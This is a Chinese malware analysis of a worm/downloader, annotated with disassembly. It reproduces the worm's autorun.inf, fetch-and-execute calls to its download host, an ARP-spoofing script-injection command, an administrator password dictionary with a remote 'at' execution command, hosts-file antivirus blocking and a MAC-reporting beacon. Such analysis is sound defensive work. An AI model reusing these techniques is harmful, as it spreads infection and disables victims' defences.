病毒先用time/srand初始化随机种子,再用rand()%3E(62)从402D90处的字符表取字符,循环10次生成一个随机名字。随后用GetFileAttributesA检查autorun.inf:如果它已存在且属性恰好等于10(FILE_ATTRIBUTE_DIRECTORY,即常见的“U盘免疫”文件夹),就用MoveFileA把该文件夹改成随机名字(示例中为C:\FV5Jz39xs0);否则就生成autorun.inf文件,并设置成只读、隐藏、系统属性。注意这里是与10精确比较,若免疫文件夹本身还带有隐藏或系统属性,属性值将不等于10,病毒便不会走改名分支,而是进入下面的fopen分支。
004041F4  |.  53            push    ebx                              ; /FileName => "C:\autorun.inf"
004041F5  |.  FF15 A8104000 call    dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA获取文件属性
004041FB  |.  83F8 10       cmp     eax, 10                        ;比较看是否是文件夹
004041FE  |.  75 0A         jnz     short 0040420A                  ;不是的话跳转,打开文件
00404200  |.  57            push    edi                              ; /NewName => "C:\FV5Jz39xs0"
00404201  |.  53            push    ebx                              ; |ExistingName => "C:\autorun.inf"
00404202  |.  FF15 5C104000 call    dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA是的话将文件名改成C:\FV5Jz39xs0
00404208  |.  EB 1B         jmp     short 00404225
0040420A  |>  E8 27FFFFFF   call    00404136
0040420F  |.  68 70224000   push    00402270                         ; /mode = "r"
00404214  |.  53            push    ebx                              ; |path
00404215  |.  E8 BE1C0000   call    <jmp.&MSVCRT.fopen>              ; \fopen
......
004042D9  |.  6A 07         push    7                                ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004042DB  |.  53            push    ebx                              ; |FileName
004042DC  |.  FF15 58104000 call    dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置成只读,隐藏,系统属性
autorun文件内容如下:
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
004042E6:创建"recycle.{645FF040-5081-101B-9F08-00AA002F954E}"这个新目录。花括号中的GUID是回收站的CLSID,Explorer通常会把这种“名字.{CLSID}”形式的目录显示成回收站图标;病毒把自身复制到该文件夹里并改名为GHOSTBAK.exe,再配合autorun.inf中的OPEN项指向该文件,诱使用户点击,使病毒文件执行。
004042E6  /$  81EC 04010000 sub     esp, 104
004042EC  |.  53            push    ebx
004042ED  |.  55            push    ebp
004042EE  |.  8B2D 44104000 mov     ebp, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcatA
004042F4  |.  56            push    esi
004042F5  |.  57            push    edi
004042F6  |.  BB 64734000   mov     ebx, 00407364                    ;  ASCII "C:\"
004042FB  |.  68 30234000   push    00402330                         ; /StringToAdd = "recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404300  |.  53            push    ebx                              ; |ConcatString => "C:\"
00404301  |.  FFD5          call    ebp                              ; \lstrcatA
00404303  |.  6A 00         push    0                                ; /pSecurity = NULL
00404305  |.  53            push    ebx                                                                   ; |Path => "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404306  |.  FF15 68104000 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA创建目录
0040430C  |.  8D4424 10     lea     eax, dword ptr [esp+10]
00404310  |.  53            push    ebx                              ; /String2 => "C:\"
00404311  |.  50            push    eax                              ; |String1
00404312  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404318  |.  8D4424 10     lea     eax, dword ptr [esp+10]
0040431C  |.  68 20234000   push    00402320                         ; /StringToAdd = "\中",BB,"?.//"
00404321  |.  50            push    eax                              ; |ConcatString
00404322  |.  FFD5          call    ebp                              ; \lstrcatA
00404324  |.  8BFB          mov     edi, ebx
00404326  |.  83C9 FF       or      ecx, FFFFFFFF
00404329  |.  33C0          xor     eax, eax
0040432B  |.  68 10234000   push    00402310                         ; /StringToAdd = "\GHOSTBAK.exe"
00404330  |.  F2:AE         repne   scas byte ptr es:[edi]           ; |
00404332  |.  F7D1          not     ecx                              ; |
00404334  |.  2BF9          sub     edi, ecx                         ; |
00404336  |.  B8 08754000   mov     eax, 00407508                    ; |
0040433B  |.  8BD1          mov     edx, ecx                         ; |
0040433D  |.  8BF7          mov     esi, edi                         ; |
0040433F  |.  8BF8          mov     edi, eax                         ; |
00404341  |.  50            push    eax                              ; |ConcatString => ""
00404342  |.  C1E9 02       shr     ecx, 2                           ; |
00404345  |.  F3:A5         rep     movs dword ptr es:[edi], dword p>; |
00404347  |.  8BCA          mov     ecx, edx                         ; |
00404349  |.  83E1 03       and     ecx, 3                           ; |
0040434C  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr>; |
0040434E  |.  FFD5          call    ebp                              ; \lstrcatA
00404350  |.  6A 00         push    0                                ; /FailIfExists = FALSE
00404352  |.  68 08754000   push    00407508                         ; |NewFileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe"
00404357  |.  68 0C764000   push    0040760C                         ; |ExistingFileName = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
0040435C  |.  FF15 64104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA将病毒文件复制到该文件夹下,并改名
00404362  |.  6A 07         push    7                                ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00404364  |.  53            push    ebx                              ; |FileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404365  |.  FF15 58104000 call   dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置文件夹属性为只读,隐藏,系统
0040436B  |.  8D4424 10     lea     eax, dword ptr [esp+10]
0040436F  |.  6A 00         push    0                                ; /pSecurity = NULL
00404371  |.  50            push    eax                              ; |Path
00404372  |.  FF15 68104000 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
00404378  |.  5F            pop     edi
00404379  |.  5E            pop     esi
0040437A  |.  5D            pop     ebp
0040437B  |.  5B            pop     ebx
0040437C  |.  81C4 04010000 add     esp, 104
00404382  \.  C3            retn


线程九:004045C7处

调用LoadLibrary加载Urlmon.dll,
0040463E  |.  50            push    eax                                    ; /FileName = "urlmon.dll"
0040463F  |.  FF15 74104000 call    dword ptr [<&KERNEL32.LoadLibraryA>]   ; \LoadLibraryA
再调用GetProcAddress获取URLDownloadToFileA函数的地址(动态获取是为了避免在导入表中直接暴露urlmon.dll的下载函数),
00404672  |.  50            push    eax                                    ; /ProcNameOrOrdinal = "URLDownloadToFileA"
00404673  |.  FF35 6C744000 push    dword ptr [40746C]                     ; |hModule = 75C60000 (urlmon)
00404679  |.  FF15 70104000 call    dword ptr [<&KERNEL32.GetProcAddress>] ; \GetProcAddress
然后是两个子函数调用004043B2和004043D5
004043B2:用URLDownloadToFileA函数将"http://www.liuliangvip.cn/down/wincap.exe"地址处的wincap.exe下载到本地"C:\WINDOWS\system32\wincap.exe",然后调用WinExec隐蔽执行wincap.exe。注意004043C4处并没有检查URLDownloadToFileA的返回值,下载是否成功都会执行WinExec。
004043B2  /$  56            push    esi                                    ;  unpacked.004023B8
004043B3  |.  6A 00         push    0
004043B5  |.  BE 74614000   mov     esi, 00406174                          ;  ASCII "C:\WINDOWS\system32\wincap.exe"
004043BA  |.  6A 00         push    0
004043BC  |.  56            push    esi
004043BD  |.  68 94184000   push    00401894                               ;  ASCII "http://www.liuliangvip.cn/down/wincap.exe"
004043C2  |.  6A 00         push    0
004043C4  |.  FF15 88644000 call    dword ptr [406488]                     ;  urlmon.URLDownloadToFileA
004043CA  |.  6A 00         push    0                                      ; /ShowState = SW_HIDE
004043CC  |.  56            push    esi                                    ; |CmdLine = "C:\WINDOWS\system32\wincap.exe"
004043CD  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]        ; \WinExec
004043D3  |.  5E            pop     esi
004043D4  \.  C3            retn
004043D5:用URLDownloadToFileA函数将"http://www.liuliangvip.cn/down/arp.exe"
地址处的arp.exe下载到本地"C:\WINDOWS\system32\arps.com"(落地文件名改为.com后缀,这是下面ARP欺骗线程要调用的工具)
004043D5  /$  33C0          xor     eax, eax
004043D7  |.  50            push    eax
004043D8  |.  50            push    eax
004043D9  |.  68 70604000   push    00406070                               ;  ASCII "C:\WINDOWS\system32\arps.com"
004043DE  |.  68 90174000   push    00401790                               ;  ASCII "http://www.liuliangvip.cn/down/arp.exe"
004043E3  |.  50            push    eax
004043E4  |.  FF15 88644000 call    dword ptr [406488]                     ;  urlmon.URLDownloadToFileA
004043EA  \.  C3            retn
创建线程0040449C:先用gethostname/gethostbyname获取本机IP地址,把所在网段内.2~.255的机器作为欺骗对象,然后用格式串"%s  -idx 0 -ip %s -port 80 -insert "%s""拼出命令行,通过WinExec隐蔽执行系统目录下的arps.com(见00404479~00404490处的sprintf/WinExec)。从参数可以看出这不只是单纯的ARP欺骗:它借助ARP欺骗劫持同网段主机的80端口HTTP流量,并向返回的网页中插入一段<script src="http://www.liuliangvip.cn/down/index.htm">标签,相当于对整个局域网挂马。下面示例中的"127.0.0.2-127.0.0.255"应是本分析环境中取到回环地址后拼出的结果。
004044F2  |.  68 80000000   push    80                                     ; /BufSize = 80 (128.)
004044F7  |.  50            push    eax                                    ; |Buffer
004044F8  |.  FF15 74114000 call    dword ptr [<&WS2_32.#57>]              ; \gethostname获取主机的主机名
004044FE  |.  8D85 ECFEFFFF lea     eax, dword ptr [ebp-114]
00404504      50            push    eax
00404505      FF15 70114000 call    dword ptr [<&WS2_32.#52>]              ;  WS2_32.gethostbyname获取对应主机的信息
......
0040445F  |.  68 98194000   push    00401998                               ; /<%s> = "<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"
00404464  |.  F3:AB         rep     stos dword ptr es:[edi]                ; |
00404466  |.  FF75 08       push    dword ptr [ebp+8]                      ; |<%s> = "127.0.0.2-127.0.0.255"
00404469  |.  66:AB         stos    word ptr es:[edi]                      ; |
0040446B  |.  AA            stos    byte ptr es:[edi]                      ; |
0040446C  |.  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]               ; |
00404472  |.  50            push    eax                                    ; |<%s> = "C:\WINDOWS\system32\arps.com"
00404473  |.  8D85 00FDFFFF lea     eax, dword ptr [ebp-300]               ; |
00404479  |.  68 60234000   push    00402360                               ; |format = "%s  -idx 0 -ip %s -port 80 -insert ""%s"""
0040447E  |.  50            push    eax                                    ; |s
0040447F  |.  E8 661A0000   call    <jmp.&MSVCRT.sprintf>                  ; \sprintf
00404484  |.  83C4 20       add     esp, 20
00404487  |.  8D85 00FDFFFF lea     eax, dword ptr [ebp-300]
0040448D  |.  6A 00         push    0                                      ; /ShowState = SW_HIDE
0040448F  |.  50            push    eax                                    ; |CmdLine = "C:\WINDOWS\system32\arps.com  -idx 0 -ip 127.0.0.2-127.0.0.255 -port 80 -insert ""<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"""
00404490  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]        ; \WinExec


线程十:00404798处

以administrator为用户名,对局域网中其他机器进行密码猜解,病毒猜解的密码字典如下:woaini、baby、asdf、NULL、angel、asdfgh、1314520、5201314、caonima、88888、bbbbbb、
12345678、memory、abc123、qwerty、123456、password、enter、hack、xpuser、money、yeah、
Time、game、user、home、alex、guest、admin、test、administrator、movie、root、love等。可以看到这是针对administrator账号的固定弱口令字典猜解(其中NULL应指空口令),局域网内任何使用这些口令或空口令的机器都会被感染。然后调用0040475F和00404AAB子函数。
0040475F:调用WSAStartup
0040476E  |.  50            push    eax                                    ; /pWSAData
0040476F  |.  68 02020000   push    202                                    ; |RequestedVersion = 202 (2.2.)
00404774  |.  FF15 7C114000 call    dword ptr [<&WS2_32.#115>]             ; \WSAStartup
00404AAB:调用mpr.dll中的WNetAddConnection2函数,用用户名Administrator和字典中的每一个密码尝试连接目标机的网络资源(NETRESOURCE结构),以此逐个猜解密码
00404B73  |.  53            push    ebx                                 ;0
00404B74  |.  895D E0       mov     dword ptr [ebp-20], ebx
00404B77  |.  FF75 0C       push    dword ptr [ebp+C]                     ;  unpacked.004024F4可选的一个密码
00404B7A  |.  895D E4       mov     dword ptr [ebp-1C], ebx               
00404B7D  |.  897D E8       mov     dword ptr [ebp-18], edi 
00404B80  |.  8975 EC       mov     dword ptr [ebp-14], esi
00404B83  |.  FF75 10       push    dword ptr [ebp+10]             ;Administrator用于连接的用户名
00404B86  |.  895D F8       mov     dword ptr [ebp-8], ebx
00404B89  |.  895D F4       mov     dword ptr [ebp-C], ebx
00404B8C  |.  50            push    eax                          ;NETRESOURCE结构
00404B8D  |.  FF55 FC       call    dword ptr [ebp-4]      ;WNetAddConnection2的地址
猜解成功后,病毒往目标机每个盘里复制hackshen.exe(文中示例为"169.254.112.1\admin$\hackshen.exe",即通过已建立的admin$共享连接写入),然后调用WinExec隐蔽执行"at \\169.254.112.1 16:47 F:\hackshen.exe"这个命令。注意at命令本身并不复制文件,而是在远程主机的计划任务服务上创建一个定时任务,在指定时间启动已复制过去的病毒文件。


线程十一:00405513处

调用00405530子函数
00405530:调用GetWindowsDirectoryA获取Windows目录,将病毒文件复制为"C:\WINDOWS\Tasks\绿化.bat"
004055AC  |.  6A 00         push    0                                      ; /FailIfExists = FALSE
004055AE  |.  8D8424 180100>lea     eax, dword ptr [esp+118]               ; |
004055B5  |.  53            push    ebx                                    ; |NewFileName => "C:\WINDOWS\Tasks\绿化.bat"
004055B6  |.  50            push    eax                            |ExistingFileName = "C:\Documents and Settings\li\"中华吸血鬼2.2\unpacked.exe"
004055B7  |.  FF15 64104000 call    dword ptr [<&KERNEL32.CopyFileA>]      ; \CopyFileA
00405530返回后,创建一个线程004055C8,枚举盘符:对每个盘符分别与"A:"和"C:"比较(两次call edi),两者都不相等时才调用0040566C,也就是只处理除软驱和系统盘之外的分区
00405617  |> /80BC35 FCFEFF>/cmp     byte ptr [ebp+esi-104], 0
0040561F  |. |75 3C         |jnz     short 0040565D
00405621  |. |8A8435 F9FEFF>|mov     al, byte ptr [ebp+esi-107]
00405628  |. |68 64224000   |push    00402264                              ;  ASCII "A:"
0040562D  |. |8845 FC       |mov     byte ptr [ebp-4], al
00405630  |. |8A8435 FAFEFF>|mov     al, byte ptr [ebp+esi-106]
00405637  |. |8845 FD       |mov     byte ptr [ebp-3], al
0040563A  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
0040563D  |. |50            |push    eax
0040563E  |. |FFD7          |call    edi
00405640  |. |85C0          |test    eax, eax
00405642  |. |74 19         |je      short 0040565D
00405644  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
00405647  |. |68 60224000   |push    00402260                              ;  ASCII "C:"
0040564C  |. |50            |push    eax
0040564D  |. |FFD7          |call    edi
0040564F  |. |85C0          |test    eax, eax
00405651  |. |74 0A         |je      short 0040565D
00405653  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
00405656  |. |50            |push    eax
00405657  |. |E8 10000000   |call    0040566C
0040566C:调用ExpandEnvironmentStringsA展开环境变量,搜索盘中后缀名为rar、zip、tgz、cab、tar的压缩文件,然后调用WinExec执行"C:\Program Files\WinRAR\Rar.exe -ep a ""E:\test.rar"" C:\WINDOWS\Tasks\绿化.bat",把病毒文件绿化.bat追加进压缩包(-ep表示不保存路径),当用户解压文件时诱使其点击绿化.bat执行病毒程序。这一步依赖本机已把WinRAR安装在该默认路径下。真是陷阱多多,阴招不断。


线程十二:004050E1处

下载各种木马,
0040510F   .  BE D8274000   mov     esi, 004027D8                         ;  ASCII "http://www.liuliangvip.cn/down/1.exe"  ;木马程序
.....
00405211   .  BE 78264000   mov     esi, 00402678                         ;  ASCII "http://www.liuliangvip.cn/down/10.exe"  ;木马程序
......
00405281   .  BB 5C714000   mov     ebx, 0040715C                         ;  ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif"           ;随机的文件名,有00404FAF产生
00405286   .  BD 90010000   mov     ebp, 190
0040528B   >  8D8424 340900>lea     eax, dword ptr [esp+934]
00405292   .  50            push    eax
00405293   .  E8 17FDFFFF   call    00404FAF
{
   ......
  00404FC1  |.  50            push    eax                                   ; /Buffer
  00404FC2  |.  68 04010000   push    104                                   ; |BufSize = 104 (260.)
  00404FC7  |.  FF15 7C104000 call    dword ptr [<&KERNEL32.GetTempPathA>]  ; \GetTempPathA获取临时文件指定的路径
  ......
  00404FE9  |.  6A 00         push    0                                     ; /timer = NULL
  00404FEB  |.  AA            stos    byte ptr es:[edi]                     ; |
  00404FEC  |.  E8 1D0F0000   call    <jmp.&MSVCRT.time>                    ; \time
  00404FF1  |.  50            push    eax                                   ; /seed
  00404FF2  |.  E8 110F0000   call    <jmp.&MSVCRT.srand>                   ; \srand
  00404FF7  |.  8065 F4 00    and     byte ptr [ebp-C], 0
  00404FFB  |.  33C0          xor     eax, eax
  00404FFD  |.  8D7D F5       lea     edi, dword ptr [ebp-B]
  00405000  |.  59            pop     ecx
  00405001  |.  AB            stos    dword ptr es:[edi]
  00405002  |.  AB            stos    dword ptr es:[edi]
  00405003  |.  59            pop     ecx
  00405004  |.  33F6          xor     esi, esi
  00405006  |.  66:AB         stos    word ptr es:[edi]
  00405008  |>  E8 F50E0000   /call    <jmp.&MSVCRT.rand>                   ; [rand产生随机的文件名
  ......
  004050CB  |.  50            push    eax    ;"http://www.liuliangvip.cn/down/3.exe"
  004050CC  |.  83E1 03       and     ecx, 3
  004050CF  |.  FF75 08       push    dword ptr [ebp+8]   ;"C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif"
  004050D2  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr [esi>
  004050D4  |.  E8 FAFCFFFF   call    00404DD3             ;下载木马程序并重命名为随机的文件名
  {
    ......
    00404E7E  |.  8B1D 74104000 mov     ebx, dword ptr [<&KERNEL32.LoadLibrar>;  kernel32.LoadLibraryA
    00404E84  |.  83C4 0C       add     esp, 0C
    00404E87  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]
    00404E8D  |.  50            push    eax                                   ; /FileName=shell32.dll
    00404E8E  |.  FFD3          call    ebx                                   ; \LoadLibraryA
    ......
    00404EE4  |.  8B1D 70104000 mov     ebx, dword ptr [<&KERNEL32.GetProcAdd>;  kernel32.GetProcAddress
    00404EEA  |.  83C4 0C       add     esp, 0C
    00404EED  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
    00404EF3  |.  50            push    eax                                   ; /ProcNameOrOrdinal=ShellExecute
    00404EF4  |.  FF35 68744000 push    dword ptr [407468]                    ; |hModule = NULL
    00404EFA  |.  FFD3          call    ebx                                   ; \GetProcAddress
    .......
    00404F2A  |.  FF35 6C744000 push    dword ptr [40746C]                    ;  urlmon.75C60000
    00404F30  |.  FFD3          call    ebx
    ......
    00404F39  |.  51            push    ecx
    00404F3A  |.  51            push    ecx
    00404F3B  |.  FF75 0C       push    dword ptr [ebp+C]                       ;ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\bx7EoOJu0B.pif"
    00404F3E  |.  FF75 08       push    dword ptr [ebp+8]                        ;ASCII "http://www.liuliangvip.cn/down/3.exe"
    00404F41  |.  51            push    ecx
    00404F42      FFD0          call    eax                                   ;  urlmon.URLDownloadToFileA下载木马程序
   }
}


线程十三:00405A85处

每隔10分钟(Sleep 0x927C0 = 600000ms)到http://www.liuliangvip.cn/down/update.ini下载update.ini文件到"C:\WINDOWS\meupdate.ini",用fgets读出第一行并将其前3个字符与硬编码的版本号"2.1"比较(见00405A39~00405A4A),如果不同则下载"http://www.liuliangvip.cn/down/mm.exe"到c:\_default.pif并执行,达到更新病毒程序的目的。(原文提到与http://www.liuliangvip.cn/22.txt做比较,但下面的代码中并没有出现该地址,以代码为准。)
00405AA8      68 C0270900   push    927C0                          ;10分钟
00405AAD   .  FF15 AC104000 call    dword ptr [<&KERNEL32.Sleep>]    ; \Sleep
00405AB3   .  68 A01C4000   push    00401CA0                         ;  ASCII "http://www.liuliangvip.cn/down/mm.exe"
00405AB8   .  E8 43FEFFFF   call    00405900
{
  00405900
  ......
  00405A01  |.  57            push    edi
  00405A02  |.  57            push    edi
  00405A03  |.  51            push    ecx       ;ASCII "C:\WINDOWS\meupdate.ini"保存到本地文件名和地址
  00405A04  |.  68 9C1B4000   push    00401B9C                              ;  ASCII   "http://www.liuliangvip.cn/down/update.ini"网站地址
  00405A09  |.  57            push    edi
  00405A0A  |.  A3 04754000   mov     dword ptr [407504], eax                ;  urlmon.URLDownloadToFileA
  00405A0F      FFD0          call    eax
  ......
  00405A28  |.  50            push    eax                              ; /stream
  00405A29  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]         ; |
  00405A2F  |.  53            push    ebx                              ; |n
  00405A30  |.  50            push    eax                              ; |s
  00405A31  |.  E8 DE040000   call    <jmp.&MSVCRT.fgets>              ; \fgets读出meupdate.ini文件
  00405A36  |.  83C4 0C       add     esp, 0C
  00405A39  |.  BE BC284000   mov     esi, 004028BC                    ;  ASCII "2.1"
  00405A3E  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]
  00405A44  |>  8A10          /mov     dl, byte ptr [eax]                  ;文件前3个字符和"2.1"进行比较
  00405A46  |.  8ACA          |mov     cl, dl
  00405A48  |.  3A16          |cmp     dl, byte ptr [esi]
  00405A4A  |.  75 1A         |jnz     short 00405A66                    ;不相同则跳到00405A66更新病毒
  ......
  00405A6F  |.  57            push    edi
  00405A70  |.  57            push    edi
  00405A71  |.  68 A41D4000   push    00401DA4                         ;  ASCII "c:\_default.pif"
  00405A76  |.  FF75 08       push    dword ptr [ebp+8]                   ;"http://www.liuliangvip.cn/down/mm.exe"
  00405A79  |.  57            push    edi
  00405A7A  |.  FF15 04754000 call    dword ptr [407504]               ;  urlmon.URLDownloadToFileA
}
00405ABD   .  59            pop     ecx
00405ABE   .  6A 00         push    0                                ; /ShowState = SW_HIDE
00405AC0   .  56            push    esi                              ; |CmdLine
00405AC1   .  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]  ; \WinExec
00405AC7   .^ EB DF         jmp     short 00405AA8


线程十四:00405AC9处

修改hosts文件。先调用ExpandEnvironmentStringsA获得%ProgramFiles%环境变量,
00405AEC  |.  68 FF000000   |push    0FF                             ; /DestSizeMax = FF (255.)
00405AF1  |.  50            |push    eax                             ; |DestString
00405AF2  |.  68 AC284000   |push    004028AC                        ; |SrcString = "%ProgramFiles%"
00405AF7  |.  FF15 80104000 |call    dword ptr [<&KERNEL32.ExpandEnv>; \ExpandEnvironmentStringsA
将hosts文件属性设为NORMAL(清掉只读等属性,保证后面能写入)
00405B25  |.  68 80000000   |push    80                              ; /FileAttributes = NORMAL
......                                                                ;获取host文件路径相关代码
00405B48  |.  50            |push    eax                             ; |FileName = "C:\WINDOWS\system32\drivers\etc\hosts"
00405B49  |.  F3:A4         |rep     movs byte ptr es:[edi], byte pt>; |
00405B4B  |.  FF15 58104000 |call    dword ptr [<&KERNEL32.SetFileAt>; \SetFileAttributesA
接着打开\\drivers\etc\hosts文件,写入如下数据:
127.0.0.0 360.qihoo.com
......
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
这样每次访问上面的网址时,都会被重定向到127.0.0.1,从而屏蔽安全厂商的网站(无法下载杀毒软件和病毒库更新)。并且每秒执行一次,防止hosts文件被改回去。清除病毒后hosts文件中这些条目需要手工删除。


线程十五:00405467处

搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送给"http://www.liuliangvip.cn/down/tj/ct.asp"页面
0040549B  |.  68 70224000   push    00402270                              ; /mode = "r"
......                                                                     ;路径相关代码
004054BE  |.  50            push    eax                                   ; |path = "C:\WINDOWS\mfxixue.ini"
004054BF  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr [esi>; |
004054C1  |.  E8 120A0000   call    <jmp.&MSVCRT.fopen>                   ; \fopen打开mfxixue.ini
......
004054CF  |.  68 981A4000   push    00401A98                              ;  ASCII "http://www.liuliangvip.cn/down/tj/ct.asp"
004054D4  |.  6A 01         push    1
004054D6  |.  E8 ACFEFFFF   call    00405387
{
   00405387  /$  55            push    ebp
   ......
   00405392  |.  6A 00         push    0                                     ; /timer = NULL
   00405394  |.  E8 750B0000   call    <jmp.&MSVCRT.time>                    ; \time
   00405399  |.  50            push    eax                                   ; /seed
   0040539A  |.  E8 690B0000   call    <jmp.&MSVCRT.srand>                   ; \srand
   0040539F  |.  59            pop     ecx
   004053A0  |.  33F6          xor     esi, esi
  004053A2  |.  59            pop     ecx
  004053A3  |>  E8 5A0B0000   /call    <jmp.&MSVCRT.rand>                   ; [rand
  ......
  004053ED  |.  74 1C         je      short 0040540B
  004053EF  |.  68 28774000   push    00407728                              ; /<%s> = "qi06AiQ0Cf"
  004053F4  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]              ; |
  004053FA  |.  FF75 0C       push    dword ptr [ebp+C]                     ; |<%s> =   "http://www.liuliangvip.cn/down/tj/ct.asp"
  004053FD  |.  68 30284000   push    00402830                              ; |format = "%s?mac=%s&ver=2.1"
  00405402  |.  50            push    eax                                   ; |s
  00405403  |.  E8 E20A0000   call    <jmp.&MSVCRT.sprintf>                 ; \sprintf
  00405408  |.  83C4 10       add     esp, 10
  0040540B  |>  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]
  00405411  |.  50            push    eax ;eax=0221FD9C, (ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")
  00405412  |.  E8 03000000   call    0040541A
  {
    0040541A  /$  56            push    esi
    ......
    00405422  |.  68 28774000   push    00407728                              ;  ASCII "qi06AiQ0Cf"
    00405427  |.  FF15 64114000 call    dword ptr [<&WININET.InternetOpenA>]  ;  WININET.InternetOpenA初始化应用程序,以使用 WinINet 函数
    0040542D  |.  8BF8          mov     edi, eax
    0040542F  |.  3BFE          cmp     edi, esi
    00405431  |.  74 2F         je      short 00405462
    00405433  |.  56            push    esi
    00405434  |.  68 00000080   push    80000000
    00405439  |.  56            push    esi
    0040543A  |.  56            push    esi
    0040543B  |.  FF7424 1C     push    dword ptr [esp+1C];(ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")
0040543F  |.  57            push    edi
    00405440  |.  FF15 60114000 call    dword ptr [<&WININET.InternetOpenUrlA>;  WININET.InternetOpenUrlA通过一个完整的HTTP网址打开一个资源
    00405446  |.  3BC6          cmp     eax, esi
    00405448  |.  74 11         je      short 0040545B
0040544A  |.  8B35 68114000 mov     esi, dword ptr [<&WININET.InternetClo>;  WININET.InternetCloseHandle
......
  }
  00405417  |.  59            pop     ecx
  00405418  |.  C9            leave
  00405419  \.  C3            retn
}


扫尾

删除两个跟安全模式有关的注册表项:"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"和"SYSTEM\CurrentControlSet\Control\SafeBoot\Network",当用户想进入安全模式清除病毒时就进不了安全模式,这招也很毒。清除病毒后需要从同版本的干净系统导出这两个键恢复,安全模式才能重新使用。


至此,病毒的全部行为都已经分析完了,病毒的行为真多,要彻底清除该病毒是一件大工程!分析过程中遇到了一些困难,但还是一一解决了,通过分析完这个病毒,收获颇丰,感受到了病毒作者的智慧。由于篇幅关系,没有给出该病毒的专杀,可能会在之后继续完善。


PS:此文章出自DragonLtx,其实之前也分析过类似的下载者,功能上也差不太多,也逆向过一部分相关代码,待整理好再发一篇此分析的姊妹篇,通过C实现相关功能吧。
